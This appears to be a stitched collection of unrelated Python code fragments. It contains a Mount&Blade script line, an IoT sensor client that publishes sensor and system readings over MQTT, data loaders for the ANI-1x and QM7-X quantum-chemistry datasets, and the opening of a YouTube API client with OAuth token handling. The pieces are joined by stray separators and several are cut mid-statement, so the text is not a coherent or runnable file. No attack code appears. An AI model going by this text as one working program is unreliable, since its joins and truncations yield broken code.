(assign, "$g_multiplayer_ready_for_spawning_agent", 1),
(assign, | |
<gh_stars>0
"""
This module provides a class for interfacing with sensors and actuators. It can add, edit and remove
sensors and actuators as well as monitor their states and execute commands.
"""
from datetime import datetime, timedelta
from json import dumps, loads
from os import getpid, path
from threading import Event, RLock
from myDevices.cloud import cayennemqtt
from myDevices.cloud.dbmanager import DbManager
from myDevices.cloud.download_speed import DownloadSpeed
from myDevices.devices import instance, manager
from myDevices.devices.bus import BUSLIST, checkAllBus
from myDevices.devices.digital.gpio import NativeGPIO as GPIO
from myDevices.system import services
from myDevices.system.systeminfo import SystemInfo
from myDevices.plugins.manager import PluginManager
from myDevices.utils.config import Config, APP_SETTINGS
from myDevices.utils.daemon import Daemon
from myDevices.utils.logger import debug, error, exception, info, logJson, warn
from myDevices.utils.threadpool import ThreadPool
from myDevices.utils.types import M_JSON
# from myDevices.system.hardware import Hardware
from myDevices.devices.manager import DYNAMIC_DEVICES
REFRESH_FREQUENCY = 15 #seconds
REAL_TIME_FREQUENCY = 60/55 #Seconds/messages, this is done to keep messages under the rate limit
sensors = {
'PCF8591' : {'description': 'PCF8591','index':0, 'device': 'PCF8591','args': {}, 'name': 'adc'},
'distance' : {'description': 'distance', 'index':1 ,'device': 'VL6180X','args': {}, 'name': 'distance'},
'object_temperature' : {'description': 'ir_temperature', 'index':2, 'device': 'MLX90614','args': {'obj_temp': True}, 'name': 'ir_body'},
'amb_temperature' : {'description': 'climate_temperature', 'index':3,'device': 'MLX90614','args': {'obj_temp': False}, 'name': 'ir_reference'},
'illuminance' : {'description': 'illuminance','index':4, 'device': 'GY30','args': {}, 'name': 'illuminance'},
'co2' : {'description': 'co2', 'index':5,'device': 'CO2Sensor','args': {'adc': 'adc', 'channel': 3}, 'name': 'co2'},
'h2s' : {'description': 'h2s', 'index':6,'device': 'MQSensor', 'args': {'adc': 'adc', 'channel': 2}, 'name': 'h2s'},
'nh3' : {'description': 'nh3', 'index':6,'device': 'MQSensor', 'args': {'adc': 'adc', 'channel': 4}, 'name': 'nh3'},
# 'bme280' : {'description': 'climate','index':7, 'device': 'BME280','args': {'temperature':True,'pressure': True,'humidity': True}, 'name': 'temperature'},
'temperature' : {'description': 'temperature','index':7, 'device': 'BME280','args': {'temperature':True}, 'name': 'climate_temperature'},
'pressure' : {'description': 'pressure','index':7, 'device': 'BME280','args': {'pressure':True}, 'name': 'climate_pressure'},
'humidity' : {'description': 'humidity','index':7, 'device': 'BME280','args': {'humidity':True}, 'name': 'climate_humidity'}
}
class SensorsClient():
"""Class for interfacing with sensors and actuators"""
def __init__(self,client):
"""Initialize the bus and sensor info and start monitoring sensor states"""
self.cloudClient = client
self.sensorMutex = RLock()
self.realTimeMutex = RLock()
self.exiting = Event()
self.onDataChanged = None
self.systemData = []
self.currentSystemState = []
self.currentRealTimeData = {}
self.queuedRealTimeData = {}
self.disabledSensors = {}
self.disabledSensorTable = "disabled_sensors"
checkAllBus()
self.gpio = GPIO()
# self.downloadSpeed = DownloadSpeed(Config(APP_SETTINGS))
# self.downloadSpeed.getDownloadSpeed()
manager.addDeviceInstance("GPIO", "GPIO", "GPIO", self.gpio, [], "system")
manager.loadJsonDevices("rest")
if not DYNAMIC_DEVICES :
warn("loadJsonDevices is None")
for sensor in sensors.values():
# info('--------{} {} {}'.format(sensor['name'], sensor['description'], sensor['device']))
self.AddSensor(sensor['name'],sensor['description'], sensor['device'], sensor['args'])
#
# info(DYNAMIC_DEVICES)
self.config = Config(APP_SETTINGS)
self.clientId = self.config.get('Agent', 'ClientID', None)
self.mqtt_dis_prefix = self.config.get('Agent', 'MQTT_DIS_PREFIX', "homeassistant")
self.serial = self.cloudClient.hardware.Serial
for name,device in DYNAMIC_DEVICES.items():
for type in device['type'] :
if type in ['DAC','ADC']:
continue
topic,message = self.AddMQTTSensorDevice(name,type,device)
if self.cloudClient:
info("{} {}".format(topic,message))
self.cloudClient.EnqueuePacket(message,topic)
# info(mqttsensor)
results = DbManager.Select(self.disabledSensorTable)
if results:
for row in results:
self.disabledSensors[row[0]] = 1
self.realTimeMonitorRunning = False
self.pluginManager = PluginManager(self.OnPluginChange)
self.pluginManager.load_plugins()
self.InitCallbacks()
self.StartMonitoring()
def AddMQTTSensorDevice(self,name,type, device):
sensor_topic = "sensor/{}/{}/config".format(self.serial,name )
unit = {"Temperature": "℃", "Humidity":"%", "Pressure":"pa", "Distance":"mm", "MQSensor":"ppm", "Luminosity":"lu", "CO2Sensor":"ppm"}
icon = {"Temperature": "mdi:coolant-temperature", "Humidity":"mdi:water", "Pressure":"mdi:file-powerpoint-box", "Distance":"mdi:ruler", "MQSensor":"mdi:gas-cylinder", "Luminosity":"mdi:white-balance-sunny", "CO2Sensor":"mdi:periodic-table-co2"}
sensor_config = \
{
"device_class": "temperature",
"name": "{}{}".format(self.cloudClient.location,name) ,
"state_topic": "{}/sensor/{}/dev:{}/state".format(self.mqtt_dis_prefix, self.serial, name),
"unit_of_measurement": unit[type],
"icon": icon[type],
"value_template": "{{ value_json.value}}"
}
return sensor_topic,sensor_config
def SetDataChanged(self, onDataChanged=None):
"""Set callback to call when data has changed
Args:
onDataChanged: Function to call when sensor data changes
"""
self.onDataChanged = onDataChanged
def QueueRealTimeData(self, name, data):
"""Add real-time data to queue to be sent on thread
Args:
name: The name to use for the data
data: The data to send
"""
with self.realTimeMutex:
if name not in self.currentRealTimeData:
self.currentRealTimeData[name] = data
else:
self.queuedRealTimeData[name] = data
def OnSensorChange(self, device, value):
"""Callback that is called when digital sensor data has changed
Args:
device: The device that has changed data
value: The new data value
"""
debug('OnSensorChange: {}, {}'.format(device, value))
with self.realTimeMutex:
data = {'name': device['description'], 'value': value, 'type': 'digital_sensor', 'unit': 'd'}
if 'args' in device:
data['args'] = device['args']
self.QueueRealTimeData(device['name'], data)
def OnPluginChange(self, data):
"""Callback that is called when digital sensor data has changed
Args:
data: The new data value
"""
debug('OnPluginChange: {}'.format(data))
self.QueueRealTimeData(data['id'], data)
with self.realTimeMutex:
if not self.realTimeMonitorRunning:
ThreadPool.Submit(self.RealTimeMonitor)
def OnGpioStateChange(self, channel, value):
"""Send updated pin state when it has changed
Args:
channel: The pin number
value: The new value for the pin
"""
debug('OnGpioStateChange: channel {}, value {}'.format(channel, value))
data = []
cayennemqtt.DataChannel.add_unique(data, cayennemqtt.SYS_GPIO, channel, cayennemqtt.VALUE, value)
if not self.realTimeMonitorRunning:
self.onDataChanged(data)
else:
self.QueueRealTimeData(data[0]['channel'], data[0])
def InitCallbacks(self):
"""Set callback function for any digital devices that support them"""
devices = manager.getDeviceList()
for device in devices:
sensor = instance.deviceInstance(device['name'])
if 'DigitalSensor' in device['type'] and hasattr(sensor, 'setCallback'):
debug('Set callback for {}'.format(sensor))
sensor.setCallback(self.OnSensorChange, device)
if not self.realTimeMonitorRunning:
ThreadPool.Submit(self.RealTimeMonitor)
def RemoveCallbacks(self):
"""Remove callback function for all digital devices"""
devices = manager.getDeviceList()
for device in devices:
sensor = instance.deviceInstance(device['name'])
if 'DigitalSensor' in device['type'] and hasattr(sensor, 'removeCallback'):
sensor.removeCallback()
def StartMonitoring(self):
"""Start thread monitoring sensor data"""
# pass
ThreadPool.Submit(self.Monitor)
def StopMonitoring(self):
"""Stop thread monitoring sensor data"""
self.RemoveCallbacks()
self.exiting.set()
def Monitor(self):
"""Monitor bus/sensor states and system info and report changed data via callbacks"""
debug('Monitoring sensors and os resources started')
sendAllDataCount = 0
nextTime = datetime.now()
while not self.exiting.is_set():
try:
difference = nextTime - datetime.now()
delay = min(REFRESH_FREQUENCY, difference.total_seconds())
delay = max(0, delay)
if not self.exiting.wait(delay):
nextTime = datetime.now() + timedelta(seconds=REFRESH_FREQUENCY)
self.currentSystemState = []
self.MonitorSystemInformation()
self.MonitorSensors()
self.MonitorPlugins()
self.MonitorBus()
if self.currentSystemState != self.systemData:
data = self.currentSystemState
if self.systemData and not sendAllDataCount == 0:
data = [x for x in self.currentSystemState if x not in self.systemData]
if self.onDataChanged and data:
self.onDataChanged(data)
sendAllDataCount += 1
if sendAllDataCount >= 4:
sendAllDataCount = 0
self.systemData = self.currentSystemState
except:
exception('Monitoring sensors and os resources failed')
debug('Monitoring sensors and os resources finished')
def RealTimeMonitor(self):
"""Monitor real-time state changes and report changed data via callbacks"""
self.realTimeMonitorRunning = True
info('Monitoring real-time state changes')
nextTime = datetime.now()
while not self.exiting.is_set():
try:
if not self.exiting.wait(0.5):
if datetime.now() > nextTime:
nextTime = datetime.now() + timedelta(seconds=REAL_TIME_FREQUENCY)
self.SendRealTimeData()
except:
exception('Monitoring real-time changes failed')
debug('Monitoring real-time changes finished')
self.realTimeMonitorRunning = False
def SendRealTimeData(self):
"""Send real-time data via callback"""
data = []
with self.realTimeMutex:
if self.currentRealTimeData:
for name, item in self.currentRealTimeData.items():
if cayennemqtt.SYS_GPIO in name:
data.append(item)
else:
cayennemqtt.DataChannel.add_unique(data, cayennemqtt.DEV_SENSOR, name, value=item['value'], name=item['name'], type=item['type'], unit=item['unit'])
try:
cayennemqtt.DataChannel.add_unique(data, cayennemqtt.SYS_GPIO, item['args']['channel'], cayennemqtt.VALUE, item['value'])
except:
pass
if name in self.queuedRealTimeData and self.queuedRealTimeData[name]['value'] == item['value']:
del self.queuedRealTimeData[name]
self.currentRealTimeData = self.queuedRealTimeData
self.queuedRealTimeData = {}
if data:
self.onDataChanged(data)
def MonitorSensors(self):
"""Check sensor states for changes"""
if self.exiting.is_set():
return
self.currentSystemState += self.SensorsInfo()
def MonitorPlugins(self):
"""Check plugin states for changes"""
if self.exiting.is_set():
return
self.currentSystemState += self.pluginManager.get_plugin_readings()
def MonitorBus(self):
"""Check bus states for changes"""
if self.exiting.is_set():
return
self.currentSystemState += self.BusInfo()
def MonitorSystemInformation(self):
"""Check system info for changes"""
if self.exiting.is_set():
return
self.currentSystemState += self.SystemInformation()
def SystemInformation(self):
"""Return dict containing current system info, including CPU, RAM, storage and network info"""
newSystemInfo = []
try:
systemInfo = SystemInfo()
newSystemInfo = systemInfo.getSystemInformation()
# download_speed = self.downloadSpeed.getDownloadSpeed()
# if download_speed:
# cayennemqtt.DataChannel.add(newSystemInfo, cayennemqtt.SYS_NET, suffix=cayennemqtt.SPEEDTEST, value=download_speed, type='bw', unit='mbps')
except Exception:
exception('SystemInformation failed')
return newSystemInfo
def CallDeviceFunction(self, func, *args):
"""Call a function for a sensor/actuator device and format the result value type
Args:
func: Function to call
args: Parameters to pass to the function
Returns:
True for success, False otherwise.
"""
result = func(*args)
debug("result={}".format(result))
if result != None:
if hasattr(func, "contentType"):
if func.contentType != M_JSON:
value_type = type(result)
response = value_type(func.format % result)
else:
response = result
else:
response = result
debug("response={}".format(response))
return response
def BusInfo(self):
"""Return a dict with current bus info"""
bus_info = []
gpio_state = self.gpio.wildcard()
for key, value in gpio_state.items():
cayennemqtt.DataChannel.add(bus_info, cayennemqtt.SYS_GPIO, key, cayennemqtt.VALUE, value['value'])
cayennemqtt.DataChannel.add(bus_info, cayennemqtt.SYS_GPIO, key, cayennemqtt.FUNCTION, value['function'])
return bus_info
def SensorsInfo(self):
"""Return a list with current sensor states for all enabled sensors"""
manager.deviceDetector()
devices = manager.getDeviceList()
sensors_info = []
if devices is None:
return sensors_info
for device in devices:
sensor = instance.deviceInstance(device['name'])
if 'enabled' not in device or device['enabled'] == 1:
sensor_types = {'Temperature': {'function': 'getCelsius', 'data_args': {'type': 'temperature', 'unit': 'c'}},
'Humidity': {'function': 'getHumidityPercent', 'data_args': {'type': 'humidity', 'unit': 'p'}},
'Pressure': {'function': 'getPascal', 'data_args': {'type': 'pressure', 'unit': 'pa'}},
'Luminosity': {'function': 'getLux', 'data_args': {'type': 'illuminance', 'unit': 'lux'}},
'Distance': {'function': 'getCentimeter', 'data_args': {'type': 'prox', 'unit': 'cm'}},
'MQSensor': {'function': 'getMQ', 'data_args': {'type': 'mq136','unit': 'ppm'}},
'CO2Sensor': {'function': 'readCO2', 'data_args': {'type': 'co2','unit': 'ppm'}},
'ServoMotor': {'function': 'readAngle', 'data_args': {'type': 'analog_actuator'}},
'DigitalSensor': {'function': 'read', 'data_args': {'type': 'digital_sensor', 'unit': 'd'}},
'DigitalActuator': {'function': 'read', 'data_args': {'type': 'digital_actuator', 'unit': 'd'}},
| |
with the lowest value
'max' - choose the index with the highest value
'random' - choose the index randomly
int - choose the index int
Na = number of atoms, Nc = number of conformations
Atomic Positions ‘coordinates’ Å float32 (Nc, Na, 3)
Atomic Numbers ‘atomic_numbers’ — uint8 (Na)
Total Energy ‘wb97x_dz.energy’ Ha float64 (Nc)
‘wb97x_tz.energy’ Ha float64 (Nc)
‘ccsd(t)_cbs.energy’ Ha float64 (Nc)
HF Energy ‘hf_dz.energy’ Ha float64 (Nc)
‘hf_tz.energy’ Ha float64 (Nc)
‘hf_qz.energy’ Ha float64 (Nc)
NPNO-CCSD(T) ‘npno_ccsd(t)_dz.corr_energy’ Ha float64 (Nc)
Correlation ‘npno_ccsd(t)_tz.corr_energy’ Ha float64 (Nc)
Energy ‘npno_ccsd(t)_qz.corr_energy’ Ha float64 (Nc)
MP2 ‘mp2_dz.corr_energy’ Ha float64 (Nc)
Correlation ‘mp2_tz.corr_energy’ Ha float64 (Nc)
Energy ‘mp2_qz.corr_energy’ Ha float64 (Nc)
Atomic Forces ‘wb97x_dz.forces’ Ha/Å float32 (Nc, Na, 3)
‘wb97x_tz.forces’ Ha/Å float32 (Nc, Na, 3)
Molecular ‘wb97x_dz.dipole’ e Å float32 (Nc, 3)
Electric ‘wb97x_tz.dipole’ e Å float32 (Nc, 3)
Moments ‘wb97x_tz.quadrupole’ e AA2 (Nc, 6)
Atomic ‘wb97x_dz.cm5_charges’ e float32 (Nc, Na)
Charges ‘wb97x_dz.hirshfeld_charges’ e float32 (Nc, Na)
‘wb97x_tz.mbis_charges’ e float32 (Nc, Na)
Atomic ‘wb97x_tz.mbis_dipoles’ a.u. float32 (Nc, Na)
Electric ‘wb97x_tz.mbis_quadrupoles’ a.u. float32 (Nc, Na)
Moments ‘wb97x_tz.mbis_octupoles’ a.u. float32 (Nc, Na)
Atomic Volumes ‘wb97x_tz.mbis_volumes’ a.u. float32 (Nc, Na)
"""
features = ['atomic_numbers', 'ccsd(t)_cbs.energy', 'coordinates', 'hf_dz.energy',
'hf_qz.energy', 'hf_tz.energy', 'mp2_dz.corr_energy', 'mp2_qz.corr_energy',
'mp2_tz.corr_energy', 'npno_ccsd(t)_dz.corr_energy', 'npno_ccsd(t)_tz.corr_energy',
'tpno_ccsd(t)_dz.corr_energy', 'wb97x_dz.cm5_charges', 'wb97x_dz.dipole',
'wb97x_dz.energy', 'wb97x_dz.forces', 'wb97x_dz.hirshfeld_charges',
'wb97x_dz.quadrupole', 'wb97x_tz.dipole', 'wb97x_tz.energy', 'wb97x_tz.forces',
'wb97x_tz.mbis_charges', 'wb97x_tz.mbis_dipoles', 'wb97x_tz.mbis_octupoles',
'wb97x_tz.mbis_quadrupoles', 'wb97x_tz.mbis_volumes']
def __init__(self, features=['atomic_numbers'], targets=[], pad=63,
embed=[(9,16,True)], criterion=None, conformation='random',
in_file='./data/ani1/ani1x-release.h5'):
self.features, self.targets = features, targets
self.conformation, self.embed = conformation, embed
self.in_file, self.pad, self.criterion = in_file, pad, criterion
self.datadic = self.load_data(features, targets, in_file)
self.ds_idx = list(self.datadic.keys())
def __getitem__(self, i):
ci = self.get_conformation_index(self.datadic[i])
def get_features(features, dtype, exclude_cat=False):
data = []
for f in features:
if f == 'atomic_numbers' and exclude_cat:
continue
#(Na)
elif f in ['atomic_numbers']:
out = np.reshape(self.datadic[i][f], -1).astype(dtype)
if self.pad:
out = np.pad(out, (0, (self.pad - out.shape[0])))
#(Nc, Na)
elif f in ['wb97x_dz.cm5_charges','wb97x_dz.hirshfeld_charges',
'wb97x_tz.mbis_charges','wb97x_tz.mbis_dipoles',
'wb97x_tz.mbis_quadrupoles','wb97x_tz.mbis_octupoles',
'wb97x_tz.mbis_volumes']:
out = np.reshape(self.datadic[i][f][ci], -1).astype(dtype)
if self.pad:
out = np.pad(out, (0, (self.pad - out.shape[0])))
#(Nc, Na, 3)
elif f in ['coordinates','wb97x_dz.forces','wb97x_dz.forces']:
out = np.reshape(self.datadic[i][f][ci], -1).astype(dtype)
if self.pad:
out = np.pad(out, (0, (self.pad*3 - out.shape[0])))
#(Nc, 6), (Nc, 3), (Nc)
else:
out = np.reshape(self.datadic[i][f][ci], -1).astype(dtype)
data.append(out)
if len(data) == 0:
return data
else:
return np.concatenate(data)
x_cat = []
if 'atomic_numbers' in self.features:
x_cat.append(as_tensor(get_features(['atomic_numbers'], 'int64')))
x_con = get_features(self.features, 'float32', exclude_cat=True)
targets = get_features(self.targets, 'float64')
return as_tensor(x_con), x_cat, as_tensor(targets)
def __len__(self):
return len(self.ds_idx)
def load_data(self, features, target, in_file):
"""data_keys = ['wb97x_dz.energy','<KEY>']
# Original ANI-1x data (https://doi.org/10.1063/1.5023802)
data_keys = ['<KEY>','<KEY>']
# CHNO portion of the data set used in AIM-Net (https://doi.org/10.1126/sciadv.aav6490)
data_keys = ['ccsd(t)_cbs.energy']
# The coupled cluster ANI-1ccx data set (https://doi.org/10.1038/s41467-019-10827-4)
data_keys = ['<KEY>']
# A subset of this data was used for training the ACA charge model
(https://doi.org/10.1021/acs.jpclett.8b01939)
ragged dataset each mol has all keys and nan for missing values
throws out the mol if any of the feature values or criterion feature values are missing
"""
attributes = features+target
if self.criterion != None and self.criterion not in attributes:
attributes.append(self.criterion)
datadic = {}
with h5py.File(in_file, 'r') as f:
for mol in f.keys():
nan = False
while not nan: # if empty values break out and del mol
data = {}
for attr in attributes:
if np.isnan(f[mol][attr][()]).any():
nan = True
else:
data[attr] = f[mol][attr][()]
datadic[mol] = data
break
if nan:
try: del datadic[mol]
except: pass
return datadic
def get_conformation_index(self, mol):
"""each molecular formula (mol) may have many different isomers
select the conformation based on some criterion (attribute value)
"""
if self.criterion == None:
criterion = self.targets[0]
else:
criterion = self.criterion
ci = 0
if isinstance(self.conformation, int):
ci = self.conformation
elif self.conformation == 'random':
ci = random.randrange(mol[criterion].shape[0])
elif self.conformation == 'max':
ci = np.argmax(mol[criterion], axis=0)
elif self.conformation == 'min':
ci = np.argmin(mol[criterion], axis=0)
return ci
class QM7X(QDataset):
"""QM7-X: A comprehensive dataset of quantum-mechanical properties spanning
the chemical space of small organic molecules
https://arxiv.org/abs/2006.15139
https://zenodo.org/record/3905361
decompress the .xz files in ./QM7X/
tar xvf *000.xz
1000.hdf5 6.5 GB
2000.hdf5 8.8 GB
3000.hdf5 16.9 GB
4000.hdf5 12.4 GB
5000.hdf5 9.8 GB
6000.hdf5 17.2 GB
7000.hdf5 9.8 GB
8000.hdf5 0.8 GB
A description of the structure generation procedure is available in the paper
related to this dataset. Each HDF5 file contains information about the molecular
properties of equilibrium and non-equilibrium conformations of small molecules
composed of up to seven heavy atoms (C, N, O, S, Cl). For instance, you can access
to the information saved in the 1000.hdf5 file as,
fDFT = h5py.File('1000.hdf5', 'r')
fDFT[idmol]: idmol, ID number of molecule (e.g., '1', '100', '94')
fDFT[idmol][idconf]: idconf, ID configuration (e.g., 'Geom-m1-i1-c1-opt', 'Geom-m1-i1-c1-50')
The idconf label has the general form "Geom-mr-is-ct-u", were r enumerated the
SMILES strings, s the stereoisomers excluding conformers, t the considered
(meta)stable conformers, and u the optimized/displaced structures; u = opt
indicates the DFTB3+MBD optimized structures and u = 1,...,100 enumerates
the displaced non-equilibrium structures. Note that these indices are not
sorted according to their PBE0+MBD relative energies.
Then, for each structure (i.e., idconf), you will find the following properties:
-'atNUM': Atomic numbers (N)
-'atXYZ': Atoms coordinates [Ang] (Nx3)
-'sRMSD': RMSD to optimized structure [Ang] (1)
-'sMIT': Momente of inertia tensor [amu.Ang^2] (9)
-'ePBE0+MBD': Total PBE0+MBD energy [eV] (1)
-'eDFTB+MBD': Total DFTB+MBD energy [eV] (1)
-'eAT': PBE0 atomization energy [eV] (1)
-'ePBE0': PBE0 energy [eV] (1)
-'eMBD': MBD energy [eV] (1)
-'eTS': TS dispersion energy [eV] (1)
-'eNN': Nuclear-nuclear repulsion energy [eV] (1)
-'eKIN': Kinetic energy [eV] (1)
-'eNE': Nuclear-electron attracttion [eV] (1)
-'eEE': Classical coulomb energy (el-el) [eV] (1)
-'eXC': Exchange-correlation energy [eV] (1)
-'eX': Exchange energy [eV] (1)
-'eC': Correlation energy [eV] (1)
-'eXX': Exact exchange energy [eV] (1)
-'eKSE': Sum of Kohn-Sham eigenvalues [eV] (1)
-'KSE': Kohn-Sham eigenvalues [eV] (depends on the molecule)
-'eH': HOMO energy [eV] (1)
-'eL': LUMO energy [eV] (1)
-'HLgap': HOMO-LUMO gap [eV] (1)
-'DIP': Total dipole moment [e.Ang] (1)
-'vDIP': Dipole moment components [e.Ang] (3)
-'vTQ': Total quadrupole moment components [e.Ang^2] (3)
-'vIQ': Ionic quadrupole moment components [e.Ang^2] (3)
-'vEQ': Electronic quadrupole moment components [eAng^2] (3)
-'mC6': Molecular C6 coefficient [hartree.bohr^6] (computed using SCS) (1)
-'mPOL': Molecular polarizability [bohr^3] (computed using SCS) (1)
-'mTPOL': Molecular polarizability tensor [bohr^3] (9)
-'totFOR': Total PBE0+MBD atomic forces (unitary forces cleaned) [eV/Ang] (Nx3)
-'vdwFOR': MBD atomic forces [eV/Ang] (Nx3)
-'pbe0FOR': PBE0 atomic forces [eV/Ang] (Nx3)
-'hVOL': Hirshfeld volumes [bohr^3] (N)
-'hRAT': Hirshfeld ratios (N)
-'hCHG': Hirshfeld charges [e] (N)
-'hDIP': Hirshfeld dipole moments [e.bohr] (N)
-'hVDIP': Components of Hirshfeld dipole moments [e.bohr] (Nx3)
-'atC6': Atomic C6 coefficients [hartree.bohr^6] (N)
-'atPOL': Atomic polarizabilities [bohr^3] (N)
-'vdwR': van der Waals radii [bohr] (N)
seletor = list of regular expression strings (attr) for searching
and selecting idconf keys.
returns mols[idmol] = [idconf,idconf,...]
idconf, ID configuration (e.g., 'Geom-m1-i1-c1-opt', 'Geom-m1-i1-c1-50')
TODO: loading multiple isotopes per molecular formula
"""
set_ids = ['1000', '2000', '3000', '4000', '5000', '6000', '7000', '8000']
properties = ['DIP','HLgap','KSE','atC6','atNUM','atPOL','atXYZ','eAT',
'eC','eDFTB+MBD','eEE','eH','eKIN','eKSE','eL','eMBD','eNE',
'eNN','ePBE0','ePBE0+MBD','eTS','eX','eXC','eXX','hCHG',
'hDIP','hRAT','hVDIP','hVOL','mC6','mPOL','mTPOL','pbe0FOR',
'sMIT','sRMSD','totFOR','vDIP','vEQ','vIQ','vTQ','vdwFOR','vdwR']
def __init__(self, features=['atNUM','atXYZ'], target=['eAT'], pad=None,
in_dir='./data/qm7x/', selector=['i1-c1-opt']):
self.features, self.target, self.pad, self.in_dir = features, target, pad, in_dir
self.embed = []
self.datamap = QM7X.map_dataset(in_dir, selector)
self.ds_idx = list(self.datamap.keys())
self.load_data(in_dir)
def __getitem__(self, i):
features = []
target = []
# select the correct h5 handle
if i == 1: j = 1
else: j = i-1
k = j // 1000
handle = self.h5_handles[k]
#if multiple conformations for a given formula i, one is randomly selected
conformations = self.datamap[i]
conformation = random.choice(conformations)
mol = handle[str(i)][conformation]
for f in self.features:
features.append(np.reshape(mol[f][()], -1).astype(np.float32))
features = np.concatenate(features)
if self.pad:
features = np.pad(features, (0, self.pad - len(features)))
for t in self.target:
target.append(np.reshape(mol[t][()], -1))
target = np.concatenate(target)
return as_tensor(features), [], as_tensor(target)
def __len__(self):
return len(self.ds_idx)
def load_data(self, in_dir):
| |
<reponame>MerleLiuKun/python-youtube
"""
Main Api implementation.
"""
from typing import Optional, List, Union
import requests
from requests.auth import HTTPBasicAuth
from requests.models import Response
from requests_oauthlib.oauth2_session import OAuth2Session
from pyyoutube.error import ErrorCode, ErrorMessage, PyYouTubeException
from pyyoutube.models import (
AccessToken,
UserProfile,
ActivityListResponse,
CaptionListResponse,
ChannelListResponse,
ChannelSectionResponse,
PlaylistListResponse,
PlaylistItemListResponse,
VideoListResponse,
CommentThreadListResponse,
CommentListResponse,
VideoCategoryListResponse,
SearchListResponse,
SubscriptionListResponse,
I18nRegionListResponse,
I18nLanguageListResponse,
MemberListResponse,
MembershipsLevelListResponse,
VideoAbuseReportReasonListResponse,
)
from pyyoutube.utils.params_checker import enf_comma_separated, enf_parts
class Api(object):
"""
Example usage:
To create an instance of pyyoutube.Api class:
>>> import pyyoutube
>>> api = pyyoutube.Api(api_key="your api key")
To get one channel info:
>>> res = api.get_channel_info(channel_name="googledevelopers")
>>> print(res.items[0])
Now this api provide methods as follows:
>>> api.get_authorization_url()
>>> api.generate_access_token()
>>> api.refresh_token()
>>> api.get_channel_info()
>>> api.get_playlist_by_id()
>>> api.get_playlists()
>>> api.get_playlist_item_by_id()
>>> api.get_playlist_items()
>>> api.get_video_by_id()
>>> api.get_videos_by_chart()
>>> api.get_videos_by_myrating()
>>> api.get_comment_thread_by_id()
>>> api.get_comment_threads()
>>> api.get_comment_by_id()
>>> api.get_comments()
>>> api.get_video_categories()
>>> api.get_subscription_by_id()
>>> api.get_subscription_by_channel()
>>> api.get_subscription_by_me()
>>> api.get_activities_by_channel()
>>> api.get_activities_by_me()
>>> api.get_captions_by_video()
>>> api.get_channel_sections_by_id()
>>> api.get_channel_sections_by_channel()
>>> api.get_i18n_regions()
>>> api.get_i18n_languages()
>>> api.get_video_abuse_report_reason()
>>> api.search()
>>> api.search_by_keywords()
>>> api.search_by_developer()
>>> api.search_by_mine()
>>> api.search_by_related_video()
"""
BASE_URL = "https://www.googleapis.com/youtube/v3/"
AUTHORIZATION_URL = "https://accounts.google.com/o/oauth2/v2/auth"
EXCHANGE_ACCESS_TOKEN_URL = "https://oauth2.googleapis.com/token"
USER_INFO_URL = "https://www.googleapis.com/oauth2/v1/userinfo"
DEFAULT_REDIRECT_URI = "https://localhost/"
DEFAULT_SCOPE = [
"https://www.googleapis.com/auth/youtube",
"https://www.googleapis.com/auth/userinfo.profile",
]
DEFAULT_STATE = "PyYouTube"
DEFAULT_TIMEOUT = 10
DEFAULT_QUOTA = 10000 # this quota reset at 00:00:00(GMT-7) every day.
def __init__(
self,
client_id: Optional[str] = None,
client_secret: Optional[str] = None,
api_key: Optional[str] = None,
access_token: Optional[str] = None,
timeout: Optional[int] = None,
proxies: Optional[dict] = None,
) -> None:
"""
This Api provide two method to work. Use api key or use access token.
Args:
client_id(str, optional):
Your google app's ID.
client_secret (str, optional):
Your google app's secret.
api_key(str, optional):
The api key which you create from google api console.
access_token(str, optional):
If you not provide api key, you can do authorization to get an access token.
If all api key and access token provided. Use access token first.
timeout(int, optional):
The request timeout.
proxies(dict, optional):
If you want use proxy, need point this param.
param style like requests lib style.
Refer https://2.python-requests.org//en/latest/user/advanced/#proxies
Returns:
YouTube Api instance.
"""
self._client_id = client_id
self._client_secret = client_secret
self._api_key = api_key
self._access_token = access_token
self._refresh_token = None # This keep current user's refresh token.
self._timeout = timeout
self.session = requests.Session()
self.proxies = proxies
if not (
(self._client_id and self._client_secret)
or self._api_key
or self._access_token
):
raise PyYouTubeException(
ErrorMessage(
status_code=ErrorCode.MISSING_PARAMS,
message="Must specify either client key info or api key.",
)
)
if self._timeout is None:
self._timeout = self.DEFAULT_TIMEOUT
def _get_oauth_session(
self,
redirect_uri: Optional[str] = None,
scope: Optional[List[str]] = None,
**kwargs,
) -> OAuth2Session:
"""
Build a request session for OAuth.
Args:
redirect_uri(str, optional)
Determines how Google's authorization server sends a response to your app.
If not provide will use default https://localhost/
scope (list, optional)
The scope you want give permission.
If you not provide, will use default scope.
kwargs(dict, optional)
Some other params you want provide.
Returns:
OAuth2 Session
"""
if redirect_uri is None:
redirect_uri = self.DEFAULT_REDIRECT_URI
if scope is None:
scope = self.DEFAULT_SCOPE
return OAuth2Session(
client_id=self._client_id,
scope=scope,
redirect_uri=redirect_uri,
state=self.DEFAULT_STATE,
**kwargs,
)
def get_authorization_url(
self,
redirect_uri: Optional[str] = None,
scope: Optional[List[str]] = None,
**kwargs,
) -> (str, str):
"""
Build authorization url to do authorize.
Args:
redirect_uri(str, optional)
Determines how Google's authorization server sends a response to your app.
If not provide will use default https://localhost/
scope (list, optional)
The scope you want give permission.
If you not provide, will use default scope.
kwargs(dict, optional)
Some other params you want provide.
Returns:
The uri you can open on browser to do authorize.
"""
oauth_session = self._get_oauth_session(
redirect_uri=redirect_uri,
scope=scope,
**kwargs,
)
authorization_url, state = oauth_session.authorization_url(
self.AUTHORIZATION_URL,
access_type="offline",
prompt="select_account",
**kwargs,
)
return authorization_url, state
def generate_access_token(
self,
authorization_response: str,
redirect_uri: Optional[str] = None,
scope: Optional[List[str]] = None,
return_json: bool = False,
**kwargs,
) -> Union[dict, AccessToken]:
"""
Use the google auth response to get access token
Args:
authorization_response (str)
The response url which google redirect.
redirect_uri(str, optional)
Determines how Google's authorization server sends a response to your app.
If not provide will use default https://localhost/
scope (list, optional)
The scope you want give permission.
If you not provide, will use default scope.
return_json(bool, optional)
The return data type. If you set True JSON data will be returned.
False will return pyyoutube.AccessToken
kwargs(dict, optional)
Some other params you want provide.
Return:
Retrieved access token's info, pyyoutube.AccessToken instance.
"""
oauth_session = self._get_oauth_session(
redirect_uri=redirect_uri,
scope=scope,
**kwargs,
)
token = oauth_session.fetch_token(
self.EXCHANGE_ACCESS_TOKEN_URL,
client_secret=self._client_secret,
authorization_response=authorization_response,
proxies=self.proxies,
)
self._access_token = oauth_session.access_token
self._refresh_token = oauth_session.token["refresh_token"]
if return_json:
return token
else:
return AccessToken.from_dict(token)
def refresh_token(
